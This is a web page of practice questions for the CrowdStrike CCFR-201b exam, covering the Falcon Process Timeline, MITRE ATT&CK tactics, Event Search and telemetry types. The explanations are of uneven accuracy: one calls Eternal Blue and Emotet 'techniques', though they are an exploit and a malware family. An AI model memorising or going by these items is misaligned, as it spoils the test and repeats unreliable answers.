CCFR-201b Online Practice Questions

Home / CrowdStrike / CCFR-201b

Latest CCFR-201b Exam Practice Questions

The practice questions for CCFR-201b exam was last updated on 2026-02-24 .

Viewing page 1 out of 7 pages.

Viewing questions 1 out of 38 questions.

Question#1

What is an advantage of using a Process Timeline?

A. Process related events can be filtered to display specific event types
B. Suspicious processes are color-coded based on their frequency and legitimacy over time
C. Processes responsible for spikes in CPU performance are displayed overtime
D. A visual representation of Parent-Child and Sibling process relationships is provided

Explanation:
According to the CrowdStrike Falcon Devices Add-on for Splunk Installation and Configuration Guide v3.1.5+, the Process Timeline tool allows you to view all cloudable events associated with a given process, such as process creation, network connections, file writes, registry modifications, etc2. You can also filter the events by various criteria, such as event type, timestamp range, file name, registry key, network destination, etc2. This is an advantage of using the Process Timeline tool because it allows you to focus on specific events that are relevant to your investigation2.

Question#2

Which of the following is NOT a category within the MITRE ATT&CK® Framework?

A. Initial Access
B. Execution
C. Detonation
D. Impact

Question#3

Which of the following is an example of a MITRE ATT&CK tactic?

A. Eternal Blue
B. Defense Evasion
C. Emotet
D. Phishing

Explanation:
According to the [MITRE ATT&CK website], MITRE ATT&CK is a knowledge base of adversary behaviors and techniques based on real-world observations. The knowledge base is organized into tactics and techniques, where tactics are the high-level goals of an adversary, such as initial access, persistence, lateral movement, etc., and techniques are the specific ways an adversary can achieve those goals, such as phishing, credential dumping, remote file copy, etc. Defense Evasion is one of the tactics defined by MITRE ATT&CK, which covers actions that adversaries take to avoid detection or prevent security controls from blocking their activities. Eternal Blue, Emotet, and Phishing are examples of techniques, not tactics.

Question#4

Which three use cases justify performing an Event Search in Falcon? (Choose three)

A. Identify process injection attempts
B. Track sensor update versions
C. Confirm unauthorized registry modifications
D. Validate command-line usage by PowerShell

Question#5

The __________ telemetry type records all parent-child process relationships and command-line arguments for launched executables.

A. File Activity
B. Registry Access
C. Process Execution
D. Network Connection

Disclaimer

This page is for educational and exam preparation reference only. It is not affiliated with CrowdStrike, CCFR, or the official exam provider. Candidates should refer to official documentation and training for authoritative information.

Exam Code: CCFR-201bQ & A: 341 Q&AsUpdated:  2026-02-24

  Get All CCFR-201b Q&As

Top 20 Exams

CertQuestionsBank doesn't offer Real Microsoft, Amazon, Cisco Exam Questions. All CertQuestionsBank content is sourced from the Internet.

Important Links

Know Us

Follow Us

Payment Methods

Payment Methods

Copyright © 2026 Certquestionbank.com Limited. All Rights Reserved.